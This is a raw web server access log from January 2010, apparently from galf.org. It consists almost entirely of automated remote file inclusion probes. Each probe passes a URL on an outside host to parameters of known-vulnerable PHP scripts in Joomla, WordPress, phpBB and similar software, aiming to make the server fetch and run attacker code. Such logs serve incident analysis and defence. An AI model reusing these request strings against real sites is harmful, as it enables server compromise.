81.24.35.80 - - [11/Jan/2010:01:02:52 -0800] "GET /logs/access_090629.log%20%20//?sIncPath=http://cep.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [11/Jan/2010:01:02:52 -0800] "GET /logs//?sIncPath=http://cep.fileave.com/id1.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [11/Jan/2010:01:02:52 -0800] "GET /?sIncPath=http://cep.fileave.com/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [11/Jan/2010:01:02:57 -0800] "GET /lang_main_album.php?phpbb_root_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:19 -0800] "GET /logs/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:19 -0800] "GET /index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:20 -0800] "GET /logs/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:20 -0800] "GET /index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:20 -0800] "GET /logs/access_091116.log/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:20 -0800] "GET /logs/access_091116.log/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:31 -0800] "GET /index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:33 -0800] "GET /logs/access_100104.log%20%20/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:34 -0800] "GET /logs/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:36 -0800] "GET /logs/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:36 -0800] "GET /index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:03:38 -0800] "GET /logs/access_100104.log%20%20/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:01:03:42 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:01:04:11 -0800] "GET /logs/access_100104.log%20%20//include/admin.lib.inc.php?site_path=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:01:04:11 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:01:04:11 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:01:04:15 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [11/Jan/2010:01:04:16 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [11/Jan/2010:01:04:16 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.55.15.194 - - [11/Jan/2010:01:05:07 -0800] "GET /logs/access_090831.log/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:01:05:07 -0800] "GET /index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:01:05:08 -0800] "GET /logs/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:05:59 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [11/Jan/2010:01:05:59 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [11/Jan/2010:01:05:59 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [11/Jan/2010:01:05:59 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:05:59 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:06:06 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:01:06:47 -0800] "GET /logs/access_090803.log/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:08:31 -0800] "GET /logs/access_090720.log/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:08:40 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:08:40 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:08:41 -0800] "GET /logs/access_090921.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:08:41 -0800] "GET /logs/access_090921.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:08:42 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:08:42 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:08:44 -0800] "GET /logs/access_090629.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:08:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:08:49 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:08:49 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:01:08:50 -0800] "GET /logs/access_090720.log/index.php?redir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:09:03 -0800] "GET /logs/access_090629.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [11/Jan/2010:01:09:33 -0800] "GET /logs/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [11/Jan/2010:01:09:33 -0800] "GET /appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [11/Jan/2010:01:09:37 -0800] "GET /logs/access_100104.log%20%20/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [11/Jan/2010:01:09:40 -0800] "GET /logs/access_090706.log%20%20//?sIncPath=http://cep.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:01:10:00 -0800] "GET /logs/access_090831.log/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:01:10:00 -0800] "GET /index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:01:10:00 -0800] "GET /logs/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:01:10:28 -0800] "GET /index.php?sayfa=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:01:10:28 -0800] "GET /logs/index.php?sayfa=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:01:10:40 -0800] "GET /logs/access_090831.log/index.php?sayfa=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [11/Jan/2010:01:12:10 -0800] "GET /logs/access_091012.log//lang_main_album.php?phpbb_root_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [11/Jan/2010:01:12:10 -0800] "GET /lang_main_album.php?phpbb_root_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [11/Jan/2010:01:12:10 -0800] "GET /logs//lang_main_album.php?phpbb_root_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:12:16 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.14.42 - - [11/Jan/2010:01:12:35 -0800] "GET /logs/access_100104.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [11/Jan/2010:01:13:14 -0800] "GET /logs/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [11/Jan/2010:01:13:14 -0800] "GET /appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [11/Jan/2010:01:13:16 -0800] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
199.120.90.223 - - [11/Jan/2010:01:13:55 -0800] "GET /logs/access_091012.log//lang_main_album.php?phpbb_root_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [11/Jan/2010:01:13:55 -0800] "GET /lang_main_album.php?phpbb_root_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [11/Jan/2010:01:13:56 -0800] "GET /logs//lang_main_album.php?phpbb_root_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:01:14:09 -0800] "GET /logs/access_090803.log/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:14:18 -0800] "GET /logs/access_090810.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:18:17 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:18:17 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:18:17 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [11/Jan/2010:01:19:55 -0800] "GET /logs/access_090629.log//?sIncPath=http://cep.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [11/Jan/2010:01:20:04 -0800] "GET /logs/access_090525.log//?sIncPath=http://cep.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:01:20:44 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:01:21:25 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:01:21:25 -0800] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:01:21:25 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:01:21:25 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:01:21:25 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:01:21:25 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:01:23:09 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:01:23:09 -0800] "GET /logs/access_100104.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:24:02 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:24:02 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:24:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:01:24:40 -0800] "GET /logs/access_090629.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:25:29 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:25:29 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:25:29 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:01:27:39 -0800] "GET /logs/access_090824.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:01:27:39 -0800] "GET /logs/access_090727.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:27:48 -0800] "GET /logs/access_091207.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:27:48 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:27:48 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [11/Jan/2010:01:28:23 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [11/Jan/2010:01:28:23 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [11/Jan/2010:01:28:23 -0800] "GET /logs/access_090525.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:28:24 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:30:32 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:30:32 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:30:32 -0800] "GET /logs/access_090629.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [11/Jan/2010:01:30:33 -0800] "GET /logs/access_090720.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:30:48 -0800] "GET /logs/access_091221.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:30:48 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:30:48 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:31:14 -0800] "GET /logs/access_090817.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:31:23 -0800] "GET /logs/access_091221.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:31:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:31:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:31:41 -0800] "GET /logs/access_090817.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.160 - - [11/Jan/2010:01:33:55 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:34:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:34:22 -0800] "GET /logs/access_091221.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:34:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:01:34:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:01:34:28 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
